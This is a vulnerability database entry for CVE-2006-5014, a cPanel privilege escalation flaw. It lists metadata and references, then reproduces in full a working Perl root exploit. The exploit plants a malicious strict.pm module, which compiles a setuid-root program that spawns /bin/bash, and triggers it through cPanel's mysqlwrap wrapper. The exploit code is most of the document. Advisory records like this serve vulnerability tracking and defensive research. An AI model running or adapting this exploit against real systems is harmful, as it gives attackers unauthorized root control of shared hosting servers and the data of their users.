cPanel Privilege Escalation Vulnerability

Vulnerability ID: 1111180
Vulnerability type: Access validation error
Published: 2006-10-01
Updated: 2006-10-01
CVE ID: CVE-2006-5014
CNNVD ID: CNNVD-200609-450
Platform: Linux
CVSS score: 9.0
|Vulnerability source
https://www.exploit-db.com/exploits/2466
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-450
|Vulnerability details
An unspecified vulnerability in cPanel allows remote authenticated users to gain privileges via unspecified vectors in (1) mysqladmin and (2) hooksadmin.
|Vulnerability EXP
#!/usr/bin/perl -w

# 10/01/06 - cPanel <= 10.8.x cpwrap root exploit via mysqladmin
# use strict; # haha oh wait..

my $cpwrap       = "/usr/local/cpanel/bin/cpwrap";
my $mysqlwrap    = "/usr/local/cpanel/bin/mysqlwrap";
my $pwd          = `pwd`;

chomp $pwd;
$ENV{'PERL5LIB'} = "$pwd";

if ( ! -x "/usr/bin/gcc" )  { die "gcc: $!\n"; }
if ( ! -x "$cpwrap" )       { die "$cpwrap: $!\n"; }
if ( ! -x "$mysqlwrap" )    { die "$mysqlwrap: $!\n"; }

open  (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
while(<CPWRAP>) {
   if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);

open  (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print  STRICT  "\$e  = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print  STRICT  "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print  STRICT  "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print  STRICT  "system(\"/bin/chmod 4755 Maildir\");\n";
print  STRICT  "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);

system("$mysqlwrap DUMPMYSQL 2>/dev/null");

if ( -e "Maildir" ) {
   system("./Maildir");
}
else {
   unlink "strict.pm";
   die "Failed\n";
}

# milw0rm.com [2006-10-01]
|References

Source: SECUNIA
Name: 22072
Link: http://secunia.com/advisories/22072
Source: BID
Name: 20163
Link: http://www.securityfocus.com/bid/20163
Source: SECTRACK
Name: 1016913
Link: http://securitytracker.com/id?1016913
Source: forums.cpanel.net
Link: http://forums.cpanel.net/showthread.php?t=58134
Source: changelog.cpanel.net
Link: http://changelog.cpanel.net/?build=&showall=1